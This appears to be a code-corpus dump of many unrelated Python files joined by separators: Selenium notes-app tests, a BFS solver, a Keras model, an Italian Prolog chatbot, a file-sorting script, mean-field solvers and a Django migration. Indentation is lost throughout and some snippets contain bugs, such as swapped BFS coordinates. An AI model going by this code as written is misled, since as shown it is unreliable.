download_attr_b = self.driver.find_element_by_css_selector('.attachments_names a').get_attribute('download')
self.assertEqual(download_attr_b, attach_name)
download_attr_c = self.driver.find_element_by_css_selector('.attach-download a:nth-last-child(2)').get_attribute('download')
self.assertEqual(download_attr_c, attach_name)
self._remove_item_without_ui(data[1]["global_id"])
self._default_state()
def test_refresh_selected_folder_in_previu_when_delete_note(self):
note_text = u"test text"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
self.driver.implicitly_wait(4000)
folder = self._select_folder_by_name(folder_name)
folder.click()
self.driver.implicitly_wait(2000)
note1_data = self._create_note_without_ui(
title = u"test_note",
text = note_text,
parent_id = folder_data["global_id"]
)["body"]["notes"][0]
note2_data = self._create_note_without_ui(
title = u"test_note",
text = note_text,
parent_id = folder_data["global_id"]
)["body"]["notes"][0]
self.driver.implicitly_wait(2000)
folder.click()
self.driver.implicitly_wait(6000)
second_note = self.driver.find_element_by_id(note1_data["global_id"])
second_note.click()
self.driver.implicitly_wait(2000)
current_folder_name = self.driver.find_element_by_css_selector('.folderListView .jq-selectbox__select-text').text
delete_button = self.driver.find_element_by_css_selector('.action_buttons.head_note li:last-child a')
delete_button.click()
button_delete_note = self.driver.find_element_by_css_selector("button.btn.btn-warning")
self.assertIsNotNone(button_delete_note)
button_delete_note.click()
time.sleep(5)
current_folder_name_after_remove = self.driver.find_element_by_css_selector('.folderListView .jq-selectbox__select-text').text
self.assertEqual(current_folder_name, current_folder_name_after_remove)
self._remove_item_without_ui(folder_data["global_id"])
def check_show_tags_list_button_position(self):
data = self._create_folder_and_note_with_image_attach(in_list = True)
edit_button = self.driver.find_element_by_css_selector(".head_note a.edit")
edit_button.click()
time.sleep(5)
size_litle_list = self.driver.find_element_by_css_selector(".chzn-choices")
self.assertEqual(size_litle_list.value_of_css_property('width'), '434px')
self.assertEqual(size_litle_list.value_of_css_property('height'), '31px')
chzn_results = self.driver.find_element_by_css_selector(".chzn-results")
self.assertEqual(chzn_results.value_of_css_property('width'), '178px')
self.assertEqual(chzn_results.value_of_css_property('height'), '190px')
chzn_drop = self.driver.find_element_by_css_selector(".chzn-drop")
self.assertEqual(chzn_drop.value_of_css_property('width'), '178px')
self.assertEqual(chzn_drop.value_of_css_property('height'), '192px')
first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
ActionChains(self.driver).context_click(first_note).perform()
dropdown = self.driver.find_element_by_css_selector(".dropdown-menu li:nth-child(3) a")
dropdown.click()
time.sleep(4)
size_litle_list = self.driver.find_element_by_css_selector(".chzn-choices")
self.assertEqual(size_litle_list.value_of_css_property('width'), '434px')
self.assertEqual(size_litle_list.value_of_css_property('height'), '31px')
chzn_results = self.driver.find_element_by_css_selector(".chzn-results")
self.assertEqual(chzn_results.value_of_css_property('width'), 'auto')
self.assertEqual(chzn_results.value_of_css_property('height'), 'auto')
chzn_drop = self.driver.find_element_by_css_selector(".chzn-drop")
self.assertEqual(chzn_drop.value_of_css_property('width'), '178px')
self.assertEqual(chzn_drop.value_of_css_property('height'), 'auto')
self._remove_item_without_ui(data[1]["global_id"])
self._default_state()
def check_moving_search_item_in_search(self):
data = self._create_folder_and_note_with_image_attach(folder_name = self._get_random_name(20), in_list = True)
edit_button = self.driver.find_element_by_css_selector(".head_note a.edit")
edit_button.click()
time.sleep(5)
size_search_in_edit = self.driver.find_element_by_css_selector(".chzn-choices.edit_mode_search").size
self.assertEqual(size_search_in_edit['width'], 372)
self.assertEqual(size_search_in_edit['height'], 33)
size_search_field_in_edit = self.driver.find_element_by_css_selector(".chzn-choices.edit_mode_search .search-field").size
self.assertEqual(size_search_field_in_edit['width'], 175)
self.assertEqual(size_search_field_in_edit['height'], 31)
select = self.driver.find_element_by_css_selector("div .tag_line:nth-child(1) form .search-field input")
select.click()
text = self._get_random_name(14)
select.send_keys(text)
time.sleep(1)
click_on_plus = self.driver.find_element_by_css_selector("#addThisTag")
click_on_plus.click()
self.driver.get(self.url)
time.sleep(4)
tags_menu_item = self.driver.find_element_by_css_selector('.tags span')
tags_menu_item.click()
time.sleep(1)
new_tag = self.driver.find_element_by_css_selector('.tags div .sub li:first-child')
new_tag.click()
time.sleep(4)
edit_button = self.driver.find_element_by_css_selector(".head_note a.edit")
edit_button.click()
time.sleep(5)
size_search_in_edit = self.driver.find_element_by_css_selector(".chzn-choices.edit_mode_search").size
self.assertEqual(size_search_in_edit['width'], 372)
self.assertEqual(size_search_in_edit['height'], 33)
size_search_field_in_edit = self.driver.find_element_by_css_selector(".chzn-choices.edit_mode_search .search-field").size
self.assertEqual(size_search_field_in_edit['width'], 74)
self.assertEqual(size_search_field_in_edit['height'], 31)
self._remove_item_without_ui(data[1]["global_id"])
self._default_state()
def test_check_show_share_individuals_window(self):
data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
self._open_share_individuals_window(from_context = True)
invite_window = self.driver.find_element_by_css_selector('.modal.fade')
self.assertTrue(invite_window.is_displayed())
self._default_state()
self._remove_item_without_ui(data[1]["global_id"])
def _create_invite(self, email = "example@i.ua"):
self._open_share_individuals_window(from_context = True)
email_textarea = self.driver.find_element_by_css_selector('input.invite_email_input')
email_textarea.send_keys(email)
send_button = self.driver.find_element_by_css_selector('.form_invites button.btn.blue')
send_button.click()
time.sleep(1)
def test_check_create_new_invite(self):
email = "example@i.ua"
data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
self._create_invite(email = email)
invite_email = self.driver.find_element_by_css_selector('.introdused_emails li p').text
used_invite_email = self.driver.find_element_by_css_selector('.inviteright li').text
self.assertEqual(invite_email, email)
self.assertEqual(used_invite_email, email)
self._default_state()
self._remove_item_without_ui(data[1]["global_id"])
def test_check_delete_invite(self):
email = "example@i.ua"
data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
self._create_invite(email = email)
invite_email = self.driver.find_element_by_css_selector('.introdused_emails li p').text
self.assertEqual(invite_email, email)
invite_item = self.driver.find_element_by_css_selector('.introdused_emails li')
ActionChains(self.driver).move_to_element(invite_item).perform()
time.sleep(1)
remove_invite_but = self.driver.find_element_by_css_selector('span.delete_attach_btn')
remove_invite_but.click()
self._default_state()
self._remove_item_without_ui(data[1]["global_id"])
def test_share_button_checkbox(self):
note_text = u"Some text"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(2)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title = u"test_note",
text = note_text,
global_id = self._get_random_name(16),
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
self.driver.refresh()
time.sleep(5)
share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
self.assertIsNotNone(share_unshare_button)
share_unshare_button.click()
time.sleep(3)
checkbox = self.driver.find_element_by_css_selector(".squaredThree label")
checkbox.click()
password = self.driver.find_element_by_css_selector(".password")
text = "password"
password.send_keys(text)
ok = self.driver.find_element_by_css_selector(".form_password button.blue")
ok.click()
share_button = self.driver.find_element_by_css_selector(".title_password .remove_select")
share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
self.assertIsNotNone(share_unshare_button)
share_unshare_button.click()
time.sleep(3)
# ckeck_input = self.driver.find_element_by_css_selector(".squaredThree input")
def test_check_none_margine_when_viewing(self):
note_text = "<p> </p> <p>sdsdsdsdsdsdsdsdsdsdsdsdd</p> <p>Some text</p>"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(2)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title = u"test_note",
text = note_text,
global_id = self._get_random_name(16),
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
self.driver.refresh()
time.sleep(2)
button_click_on_first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
button_click_on_first_note.click()
time.sleep(4)
margine_none = self.driver.find_element_by_css_selector("#scrollbarNotesText .jspPane:first-child p:nth-last-child(1)")\
.value_of_css_property("margin");
self.assertEqual(margine_none, '');
delete_note_button = self.driver.find_element_by_css_selector(".action_buttons.head_note a.trash")
delete_note_button.click()
time.sleep(1)
confirmation_button = self.driver.find_element_by_css_selector("button.btn.btn-warning")
confirmation_button.click()
self._remove_item_without_ui(folder_data["global_id"])
|
import os
import subprocess
from backbone.nodes import node
from backbone.logger import logger
from backbone.report import report
from backbone.format import format
os.environ["PYTHONPATH"] = os.getcwd()
import sys
import ast
def get_nodes_by_type(ty):
list = []
for element in ast.literal_eval(sys.argv[1]) :
#print element
if ty.lower() in map(lambda x : x.lower(),element['type']) :
list.append(node(element))
return list
def get_var(var) :
element = ast.literal_eval(sys.argv[2])
try :
val = element[var.lower()]
except KeyError :
val = None
return val
#def create_node(hostname,
# Creating a logging here
#def logger():
# return logger.logger(sys.argv[0])
def smart_find_by_type(type) :
'''
This is a utill to find the nodes by type using the test bed available
The util provides a list of nodes that can be safely asumed to be the type of node,
that is provided as arguemnt to the util.
'''
list = []
if type.lower() == 'namenode' :
nodes = get_nodes_by_type(type)
if len(nodes) >= 2 :
return nodes
else :
for node in nodes :
return node.cliCmd('show cluster global')
else :
if type.lower() in ['psql','pgsql'] :
'''
Need to find the psql from namenode
'''
nodes = get_nodes_by_type('namenode')
if nodes == [] :
return None
else :
node = [ i for i in nodes if i.isMaster() ]
node = node[0]
try :
count = int(node.shellCmd('cli -m config -t \'show ru fu\' | grep -i \'parque\' | grep oozie | wc -l ') )
except ValueError,TypeError :
if count > 0 :
pass
def userInput(req):
'''
To ask for user input
'''
x = raw_input('USERINPUT: %s ' % req )
return x.rstrip()
|
import sys
import os
f = open("C:/Users/user/Documents/python/ant_re/import.txt","r")
sys.stdin = f
# -*- coding: utf-8 -*-
from queue import Queue
h,w = map(int,input().split())
c = [[0] * w for _ in range(h)]
sx,sy,gx,gy = 0,0,0,0
for i in range(h):
c[i] = list(input())
for j in range(w):
if c[i][j] == "s":
sx,sy = j,i
elif c[i][j] == "g":
gx,gy = j,i
def bfs():
global que,checked,ans
while not que.empty():
xy = que.get()
if xy[0] == gx and xy[1] == gy:
ans = True
return
for i in range(-1,2):
for j in range(-1,2):
if i == j or i == -j:
continue
if 0 <= xy[0] + i < w and 0 <= xy[1] + j < h:
if checked[xy[1] + j][xy[0] + i] != 0:
if c[xy[1] + j][xy[0] + i] != "#":
if checked[xy[1]][xy[0]] < checked[xy[1] + j][xy[0] + i]:
checked[xy[1] + j][xy[0] + i] = checked[xy[1]][xy[0]]
que.put([xy[0] + i,xy[1] + j])
else:
if checked[xy[1]][xy[0]] < 2:
if checked[xy[1]][xy[0]] + 1 < checked[xy[1] + j][xy[0] + i] :
checked[xy[1] + j][xy[0] + i] = checked[xy[1]][xy[0]] + 1
que.put([xy[0] + i,xy[1] + j])
que = Queue()
checked = [[3] * w for _ in range(h)]
ans = False
checked[sy][sx] = 0
que.put([sy,sx])
bfs()
if ans:
print("YES")
else:
print("NO")
|
import numpy as np
import pandas as pd
from tensorflow.keras.losses import binary_crossentropy, mse
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Dropout, Flatten, Dense, Activation, BatchNormalization, GlobalAveragePooling2D, Input, Concatenate
from tensorflow.keras.metrics import TruePositives, FalsePositives, FalseNegatives
from tensorflow.keras.optimizers import Adam
import tensorflow as tf
IMG_HEIGHT = 64
IMG_WIDTH = 64
IMG_CHANNELS = 3
def custom_loss(y_true, y_pred):
y_true = tf.reshape(y_true, [1, 5])
y_pred = tf.reshape(y_pred, [1, 5])
class_loss = binary_crossentropy(y_true[:, 0], y_pred[:, 0])
# need make Euclidian distance loss here
reg_loss = mse(y_true[:, 1:5], y_pred[:, 1:5])
return class_loss * y_true[:, -1] + 2 * reg_loss
def make_model():
input_layer = Input(shape=[IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS])
x = Conv2D(32, (3, 3), activation='relu')(input_layer)
x = Conv2D(32, (3, 3), activation='relu')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
x = Conv2D(64, (3, 3), activation='relu')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
x = Flatten()(x)
x = Dense(1000, activation='relu')(x)
x = Dense(200, activation='relu')(x)
out_1 = Dense(1, activation='sigmoid')(x)
out_2 = Dense(4, activation='linear')(x)
output_layer = Concatenate()([out_1, out_2])
model = Model(input_layer, output_layer)
model.compile(optimizer = Adam(learning_rate=0.0001), loss = custom_loss)
return model
|
from PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton, QLineEdit, \
QListWidget, QListWidgetItem, QAbstractItemView, QMessageBox
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtCore import Qt as qtC
from pyswip import Prolog
import spacy
import nltk
import random
import sys
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
# TODO BONUS: sistemare problema lista partecipanti [PROLOG]
# TODO BONUS: sintetizzatore vocale
prolog = Prolog()
prolog.consult('prolog/facts.pl')
prolog.consult('prolog/rules.pl')
nlp = spacy.load('it_core_news_lg')
noun_exeption = ["baciamano", "carlo"]
adj_exception = ["vecchio", "nuovo", "farnese"]
pron_exception = ["avancorpi"]
num_exception = ["due"]
who_answer = ["È stato", "Certamente è stato", "Ovviamente è stato", "Senza dubbio è stato", "Come è noto, è stato",
"Come è ben noto, è stato"]
when_answer = ["È successo nel", "È avvenuto nel", "È capitato nel"]
no_answer = ["Mi dispiace, non trovo una risposta", "Risposta non trovata", "Non so che dire"]
where_dict = ["trovare", "aprire", "collocare", "rinvenire", "conservare"]
dictionary = {
"affrescare": ["dipingere", "decorare"],
"realizzare": ["dipingere", "costruire", "eseguire", "scolpire"],
"terminare": ["costruire", "edificare"],
"cominciare": ["iniziare"],
"iniziare": ["cominciare"],
"sottoporre": ["presentare", "proporre"],
"partecipare": ["aderire"],
"opporre": ["rifiutare"],
"restaurare": ["aggiustare", "ristrutturare", "risanare"],
"giungere": ["arrivò"],
"collocare": ["porre", "posizionare", "mettere", "situare", "sistemare"],
"rinvenire": ["trovare", "recuperare", "scoprire"],
"conservare": ["custodire", "trovare", "porre"],
"trovare": ["situato", "porre", "collocare"]
}
def resolve_query(nlp_text, query, type='other'):
verb_question = []
obj = []
for token in nlp_text:
if token.pos_ == "VERB":
if token.text not in noun_exeption:
verb_question.append(token.lemma_)
else:
obj.append(token.text)
elif token.pos_ == "NOUN":
obj.append(token.text)
elif token.pos_ == "ADJ" or token.pos_ == "PRON" or token.pos_ == "NUM":
if token.text in adj_exception or token.text in pron_exception or token.text in num_exception:
obj.append(token.text)
obj = ' '.join(obj)
min_obj = ""
min_where = 25
min_who_when = 25
for ans in prolog.query(query):
if type == "where":
for verb in verb_question:
if verb in where_dict:
obj_ = ans['X'].decode('utf-8')
min_local = nltk.edit_distance(obj_, obj)
# print(min_local, ans['Z'].decode('utf-8'))
if min_local < min_where:
min_where = min_local
min_obj = ans['X'].decode('utf-8') + " si trova " + ans['Y'].decode('utf-8') + " " + ans[
'Z'].decode('utf-8')
else:
verb = nlp(ans['Y'].decode('utf-8'))
for v in verb:
if v.pos_ == "VERB":
for vq in verb_question:
try:
if vq == v.lemma_ or vq in dictionary[v.lemma_]:
min_local = nltk.edit_distance(obj, ans['Z'].decode('utf-8').lower())
# print(min_local, ans['X'].decode('utf-8'))
if min_local < min_who_when:
min_who_when = min_local
min_obj = ans['X'].decode('utf-8')
except:
pass
return min_obj
class App(QMainWindow):
def __init__(self):
super().__init__()
self.title = 'Donato Chatbot'
self.left = 100
self.top = 100
self.width = 600
self.height = 300
self.thread = None
self.threadMain = None
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setFixedSize(self.width, self.height)
self.setGeometry(self.left, self.top, self.width, self.height)
self.textbox = QLineEdit(self)
self.textbox.move(10, 250)
self.textbox.resize(500, 32)
self.textbox.setPlaceholderText("Fammi una domanda ...")
# Button send message
self.button = QPushButton('Invia', self)
self.button.move(515, 250)
self.button.resize(75, 32)
# Logger
self.list_widget = QListWidget(self)
self.list_widget.resize(580, 230)
self.list_widget.move(10, 10)
# connect button to function on_click
self.button.clicked.connect(self.on_click)
self.show()
@pyqtSlot()
def on_click(self):
question = self.textbox.text().lower()
if question == "":
QMessageBox.about(self, "Error", "La domanda non può essere vuota!")
else:
nlp_text = nlp(question)
nlp_arr = []
[nlp_arr.append(token.text) for token in nlp_text]
item = QListWidgetItem('[UTENTE] ' + question)
item.setForeground(qtC.red)
self.list_widget.addItem(item)
QAbstractItemView.scrollToBottom(self.list_widget)
if "chi" in nlp_arr:
result = resolve_query(nlp_text, 'query_who_what(X,Y,Z)')
if result != "":
self.list_widget.addItem(QListWidgetItem('[DONATO] {verb} {who}'.format(verb=random.choice(who_answer), who=result)))
QAbstractItemView.scrollToBottom(self.list_widget)
else:
self.list_widget.addItem(
QListWidgetItem('[DONATO] {result}'.format(result=random.choice(no_answer))))
QAbstractItemView.scrollToBottom(self.list_widget)
elif "quando" in nlp_arr:
result = resolve_query(nlp_text, 'query_when(Z,Y,X)')
if result != "":
self.list_widget.addItem(
QListWidgetItem('[DONATO] {verb} {when}'.format(verb=random.choice(when_answer), when=result)))
QAbstractItemView.scrollToBottom(self.list_widget)
else:
self.list_widget.addItem(
QListWidgetItem('[DONATO] {result}'.format(result=random.choice(no_answer))))
QAbstractItemView.scrollToBottom(self.list_widget)
elif "dove" in nlp_arr:
result = resolve_query(nlp_text, 'query_where(X,Y,Z)', 'where')
if result != "":
self.list_widget.addItem(
QListWidgetItem('[DONATO] {result}'.format(result=result)))
QAbstractItemView.scrollToBottom(self.list_widget)
else:
self.list_widget.addItem(
QListWidgetItem('[DONATO] {result}'.format(result=random.choice(no_answer))))
QAbstractItemView.scrollToBottom(self.list_widget)
else:
self.list_widget.addItem(
QListWidgetItem('[DONATO] Non ho capito, puoi ripetere?'))
QAbstractItemView.scrollToBottom(self.list_widget)
self.textbox.setText("")
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_())
|
from PIL import Image
img=Image.open('sal.png')
img.show()
|
import shutil
import os
dirpath = os.getcwd()
files = os.listdir()
# sort all files first by extension
sort_files = sorted(files, key=lambda x: os.path.splitext(x)[1])
# only non folders
zz = []
for x in range(len(sort_files)):
if os.path.splitext(sort_files[x])[1] != '':
zz.append(sort_files[x])
n = []
# extract only extension names
for x in range(len(sort_files)):
if os.path.splitext(sort_files[x])[1] != '':
n.append(os.path.splitext(sort_files[x])[1])
# different file exts
different_ext = []
for t in range(len(n)):
if n[t] not in different_ext:
different_ext.append(n[t])
yu = 0
# make automatic first folder
try:
os.mkdir(different_ext[yu])
print('Made folder |%s| \n' %different_ext[yu])
shutil.move(dirpath + '\\' + zz[0], dirpath + '\\' + different_ext[yu])
print('Moved |%s| to new folder |%s|\n' %(zz[0],different_ext[yu]))
except OSError as e:
print('Folder |%s| exists, moving |%s| to |%s|...\n'%(different_ext[yu],zz[0],different_ext[yu]))
shutil.move(dirpath + '\\' + zz[0], dirpath + '\\' + different_ext[yu])
for x in range(len(n) - 1):
if n[x + 1] == n[x]:
shutil.move(dirpath + '\\' + zz[x + 1], dirpath + '\\' + different_ext[yu])
print('moved |%s| to |%s|\n' %(zz[x+1],different_ext[yu]))
if n[x + 1] != n[x]:
yu += 1
try:
os.mkdir(different_ext[yu])
print('made NEW folder |%s|\n' %different_ext[yu])
shutil.move(dirpath + '\\' + zz[x + 1], dirpath + '\\' + different_ext[yu])
print('moved |%s| to NEW folder |%s|\n' %(zz[x+1],different_ext[yu]))
except OSError as e:
print('Folder |%s| EXISTS, moving |%s| to |%s| \n' %(different_ext[yu],zz[x+1],different_ext[yu]))
shutil.move(dirpath + '\\' + zz[x + 1], dirpath + '\\' + different_ext[yu])
print('moved |%s| to |%s|\n' %(zz[x+1],different_ext[yu]))
|
def prefill(n, v=None):
try:
return [v] * int(n)
except (TypeError, ValueError):
raise TypeError('{} is invalid'.format(n))
|
class A:
name = None
age = None
height = None
def __init__(self):
self.name = 'test'
self.age = 2
def func(self):
print(self.height)
def func_2(self):
a = 888
self.to_be_defined(a)
def to_be_defined(self, a):
pass
|
def hello():
print("hello")
# Hope this works and creates a pull request
|
def factorial(n):
return None if n <0 else (1 if n<2 else n * factorial(n-1))
'''
In mathematics, the factorial of integer 'n' is written as 'n!'. It is equal to
the product of n and every integer preceding it. For example: 5! = 1 x 2 x 3 x 4 x 5 = 120
Your mission is simple: write a function that takes an integer 'n' and returns 'n!'.
You are guaranteed an integer argument. For any values outside the positive range,
return null, nil or None .
Note: 0! is always equal to 1. Negative values should return null;
'''
|
# Francesca Mastrogiuseppe 2018
import numpy as np
import scipy
import matplotlib.pyplot as plt
from dsn.util.fct_integrals import *
#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####
### Solve mean-field equations
### Non-trivial solutions, solved through iteration
def SolveStatic(
y0, g, VecPar, eps, tolerance=1e-10, backwards=1
): # y[0]=mu, y[1]=Delta0
# The variable y contains the mean-field variables mu, delta0 and K
# Note that, for simplicity, only delta0 and one first-order statistics (kappa) get iterated
# The variable backwards can be set to (-1) to invert the flow of iteration and reach unstable solutions
again = 1
y = np.array(y0)
y_new = np.ones(3)
Mm, Mn, Mi, Sim, Sin, Sini, Sip = VecPar
Sii = np.sqrt((Sini / Sin) ** 2 + Sip ** 2)
count = 1
ys = []
while again == 1:
ys.append(y.copy())
# Take a step
mu = Mm * y[2] + Mi
new1 = g * g * PhiSq(mu, y[1]) + Sim ** 2 * y[2] ** 2 + Sii ** 2
new2 = Mn * Phi(mu, y[1]) + Sini * Prime(mu, y[1])
y_new[0] = Mm * new2 + Mi
y_new[1] = (1 - eps) * y[1] + eps * new1
y_new[2] = (1 - backwards * eps) * y[2] + backwards * eps * new2
# Stop if the variables converge to a number, or zero
# If it becomes nan, or explodes
if np.fabs(y[1] - y_new[1]) < tolerance * np.fabs(y[1]) and np.fabs(
y[2] - y_new[2]
) < tolerance * np.fabs(y[2]):
again = 0
if (
np.fabs(y[1] - y_new[1]) < tolerance
and np.fabs(y[2] - y_new[2]) < tolerance
):
again = 0
if np.isnan(y_new[0]) == True:
again = 0
y_new = [0, 0, 0]
if np.fabs(y[2]) > 1 / tolerance:
again = 0
y_new = [0, 0, 0]
y[0] = y_new[0]
y[1] = y_new[1]
y[2] = y_new[2]
count += 1
ys = np.array(ys)
return ys, count
def SolveStatic2(
y0, g, rho, VecPar, eps, tolerance=1e-10, backwards=1
): # y[0]=mu, y[1]=Delta0
# The variable y contains the mean-field variables mu, delta0 and K
# Note that, for simplicity, only delta0 and one first-order statistics (kappa) get iterated
# The variable backwards can be set to (-1) to invert the flow of iteration and reach unstable solutions
again = 1
y = np.array(y0)
y_new = np.ones(3)
Mm, Mn, Mi, Sim, Sin, Sini, Sip = VecPar
Sii = np.sqrt((Sini / Sin) ** 2 + Sip ** 2)
count = 1
ys = []
while again == 1:
ys.append(y.copy())
# Take a step
mu = Mm * y[2] + Mi
new1 = g * g * PhiSq(mu, y[1]) + Sim ** 2 * y[2] ** 2 + Sii ** 2
new2 = Mn * Phi(mu, y[1]) + Sini * Prime(mu, y[1])
# + rho*Sim*Sin*y[2] * Prime(mu, y[1])
y_new[0] = Mm * new2 + Mi
y_new[1] = (1 - eps) * y[1] + eps * new1
y_new[2] = (1 - backwards * eps) * y[2] + backwards * eps * new2
# Stop if the variables converge to a number, or zero
# If it becomes nan, or explodes
if np.fabs(y[1] - y_new[1]) < tolerance * np.fabs(y[1]) and np.fabs(
y[2] - y_new[2]
) < tolerance * np.fabs(y[2]):
again = 0
if (
np.fabs(y[1] - y_new[1]) < tolerance
and np.fabs(y[2] - y_new[2]) < tolerance
):
again = 0
if np.isnan(y_new[0]) == True:
again = 0
y_new = [0, 0, 0]
if np.fabs(y[2]) > 1 / tolerance:
again = 0
y_new = [0, 0, 0]
y[0] = y_new[0]
y[1] = y_new[1]
y[2] = y_new[2]
count += 1
ys = np.array(ys)
return ys, count
|
# Copyright 2009-2010, BlueDynamics Alliance - http://bluedynamics.com
from zope.interface import (
Interface,
Attribute,
)
class ISoupAnnotatable(Interface):
"""Marker for persisting soup data.
"""
class ISoup(Interface):
"""The Container Interface.
"""
id = Attribute(u"The id of this Soup")
nextrecordindex = Attribute(u"The next record index to use.")
def add(record):
"""Add record to soup.
@param record: IRecord implementation
@return: intid for record
"""
def query(**kw):
"""Query Soup for Records.
@param kw: Keyword arguments defining the query
@return: list of records
"""
def rebuild(self):
"""replaces the catalog and reindex all records."""
def reindex(record=None):
"""Reindex the catalog for this soup.
if record is None reindex all records, otherwise a list of records is
expected.
"""
def __delitem__(record):
"""Delete Record from soup.
If given record not contained in soup, raise ValueError.
@param record: IRecord implementation
@raise: ValueError if record not exists in this soup.
"""
class IRecord(Interface):
"""The record Interface.
"""
id = Attribute(u"The id of this Record")
intid = Attribute("The intid of this record. No longint!")
data = Attribute(u"Dict like object representing the Record Data")
class ICatalogFactory(Interface):
"""Factory for the catalog used for Soup.
"""
def __call__():
"""Create and return the Catalog.
@param return: zope.app.catalog.catalog.Catalog instance
"""
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0003_remove_guest_email'),
]
operations = [
migrations.CreateModel(
name='Accomodation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('address', models.CharField(max_length=255)),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Bed',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(default=b'single', max_length=2, choices=[(b'double', b'do'), (b'single', b'si')])),
('is_sofa_bed', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Room',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('accomodation', models.ForeignKey(to='core.Accomodation')),
],
),
migrations.AddField(
model_name='bed',
name='room',
field=models.ForeignKey(to='core.Room'),
),
migrations.AddField(
model_name='guest',
name='bed',
field=models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, to='core.Bed', null=True),
),
]
|
import matplotlib.pyplot as plt
speaker_results = open('F:\Projects\Active Projects\Project Intern_IITB\Vowel Evaluation (Speaker Wise Data)\\Vowel_Evaluation_V5_Speaker_Based.csv', 'r')
sr = speaker_results.read()
# print sr
list_data = sr.split('\n')
# print list_data
list_data.pop(0)
list_data.pop(-1)
list_data.pop(-1)
# print list_data
data = []
for j in list_data:
data.append((j.split(',')))
name = []
precision = []
recall = []
no_of_files =[]
for j in range(len(data)):
name.append(data[j][0])
precision.append(data[j][1])
recall.append(float(data[j][2]))
no_of_files.append(data[j][3])
axis_p = []
axis_r = []
for j in range(len(name)):
axis_p.append(j)
axis_r.append(j+0.1)
# plt.stem(axis_p,precision,'red',label='Precision')
# plt.stem(axis_r,recall,'blue',label='Recall')
plt.scatter(axis_p,precision,color='red',label='Precision')
plt.scatter(axis_r,recall,color='blue',label='Recall')
for j in range(len(axis_p)):
plt.vlines(axis_p[j],0,precision[j])
for j in range(len(axis_r)):
plt.vlines(axis_r[j],0,recall[j])
plt.xlabel('Speaker No')
plt.ylabel('Precision and Recall')
for j in range(len(axis_p)):
plt.text(axis_p[j]+0.01, recall[j]+0.01, str(no_of_files[j]),fontsize='10')
plt.xlim(-0.5,len(axis_r)+0.5)
plt.ylim(0,1.1)
plt.hlines(0.8,0,len(axis_r))
# plt.legend()
plt.legend(loc="upper left", bbox_to_anchor=(1,1))
plt.show()
|
/home/joey/Documents/robots/solveRobots.py
|
from collections import OrderedDict
from unittest import TestCase
from pyjsonnlp.tokenization import ConllToken, segment, surface_string, subtract_tokens
test_text = """That fall, two federal agencies jointly announced that the Russian government "didn't direct recent compromises of e-mails from US persons and institutions, including US political organizations," and, " [t]hese thefts and disclosures are intended to interfere with the US election process." After the election, in late December 2016, the United States imposed sanctions on Russia for having interfered in the election. By early 2017, several congressional committees were examining Russia's interference in the election."""
class TestTokenization(TestCase):
def test_conll_token(self):
t = ConllToken(space_prefix=' ', value='test', offset=10)
assert 'test' == t.value, t.value
assert ' ' == t.spacing, t.spacing
assert 10 == t.offset, t.offset
assert not t.space_after
t.space_after = True
assert t.space_after
def test_segment(self):
sentences = segment(test_text)
words = []
spaces = []
for sent in sentences:
for token in sent:
words.append(token.value)
spaces.append(token.space_after)
expected_words = ['That', 'fall', ',', 'two', 'federal', 'agencies', 'jointly', 'announced', 'that', 'the', 'Russian', 'government', '"', 'did', 'not', 'direct', 'recent', 'compromises', 'of', 'e', 'mails', 'from', 'US', 'persons', 'and', 'institutions', ',', 'including', 'US', 'political', 'organizations', ',', '"', 'and', ',', '"', '[', 't', ']', 'hese', 'thefts', 'and', 'disclosures', 'are', 'intended', 'to', 'interfere', 'with', 'the', 'US', 'election', 'process', '.', '"', 'After', 'the', 'election', ',', 'in', 'late', 'December', '2016', ',', 'the', 'United', 'States', 'imposed', 'sanctions', 'on', 'Russia', 'for', 'having', 'interfered', 'in', 'the', 'election', '.', 'By', 'early', '2017', ',', 'several', 'congressional', 'committees', 'were', 'examining', 'Russia', "'s", 'interference', 'in', 'the', 'election', '.']
